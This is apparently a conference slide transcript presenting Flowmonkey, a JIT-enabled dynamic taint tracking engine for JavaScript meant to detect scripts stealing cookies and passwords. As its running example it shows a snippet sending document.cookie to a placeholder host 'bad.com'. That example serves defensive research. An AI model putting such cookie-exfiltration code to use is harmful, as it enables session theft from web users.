Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript Don Jang UC San Diego
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Flowmonkey: A Fast Dynamic Taint Tracking
Engine for JavaScript
Don Jang UC San Diego
document.cookie
Identity Theft✗ Cookie Stealing
Password
Credit card #
Browsing history
Epidemic of Data Stealing JavaScript!
How to Detect Data Stealing?
Without Sacrificing Performance?
MotivationDynamic Taint Tracking
FlowmonkeyFuture Work&Conclusion
Dynamic Taint Tracking
Tracks where a value goes at runtime
Dynamic Taint Tracking
1. Tag a value with a taint2. Propagate taints with the value3. Block taints from untrusted sinks
Example:Cookie Stealing
ck = document.cookie data = tmp + ck;
send(“bad.com”, data);
Example:Cookie Stealing
Inject Taints(At confidential sources)
ck = document.cookie data = tmp + ck;
send(“bad.com”, data );
document.cookie;
Example:Cookie Stealing
Propagate Taints(At assignments, etc)
ck = document.cookie; data = tmp + ck;
send(“bad.com”, data );
ck
ck;tmp +data
data
ck = document.cookie; data = tmp + ck;
send(“bad.com”, data );
Example:Cookie Stealing
Block Taints(At untrusted sinks)
“cr=” + color
send(“bad.com”, data );
Dynamic Taint Tracking:Policies
Cookie Protectioncookie send()
Password Protectionpassword send()
✗ ✗
General Policysecret info expression✗
Dynamic Taint Tracking:JSCross site scripting prevention with dynamic data
tainting and static analysis, NDSS'07
Analyzing information flow in JavaScript-based browser extensions, ACSAC'09
An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications, CCS'10
10~100x slowdown
Goal: Make It Fast
MotivationDynamic Taint Tracking
FlowmonkeyFuture Work&Conclusion
Interpreter JIT Engine
Source code
Based on Jaegermonkey
Modification M
Taint tracking logic is augmented
Language Extensions__taint(val, t)
val: a value to be taintedt : a taint to be used
Language Extensions__taintof(val)
returns the taint of val
Language Extensions var secret = __taint(34349, 1); tmp = secret * 68; tmp2 = tmp + “345”; tmp3 = parseInt(tmp2);
alert(__taintof(tmp)); // 1 is printed
Implementation: Shadow Stack
s * 6push s //s=5push 6mul
5
6
30
6’s taint
s’ taintJoined taint
Real Stack Shadow Stack
Implementation: Shadow Property
a.fld = secret
a
fld …
fld‘s taint …
Real Properties
Shadow Properties
Hybrid Approach
Full-fledged Taint Tracking
Interpreter
Taint DetectingJIT Engine
Hybrid Approach
Full-fledged Taint Tracking
Interpreter
Taint DetectingJIT Engine
If it doesn’t touch a taint
Hybrid Approach
Full-fledged Taint Tracking
Interpreter
Taint DetectingJIT Engine
Taint detected!!
Do full-fledgedtaint tracking
Hybrid Approach
Rapid prototypingFast with few taints
Slow with many taints
Performance: Baseline
Sunspidercookie doesn’t flow to 3rd party
code
Performance: Cookie Tracking
Sunspidercookie doesn’t flow to 3rd party
code
Demo
MotivationDynamic Taint Tracking
FlowmonkeyFuture Work&Conclusion
Future WorkMissing Flows
Implicit Flows, Timing Channel, etc
Empirical StudyTo prove the usability of taint tracking
ConclusionsA Fast Hybrid Taint Tracking EngineFirst JIT-enabled taint tracking engine
Still Many Missing PartsPossible to make it a protection tool?Can we sacrifice some performance?
Resourceshttp://firebird.ucsd.edu/flowmonkey
Thank you!
Related Documents
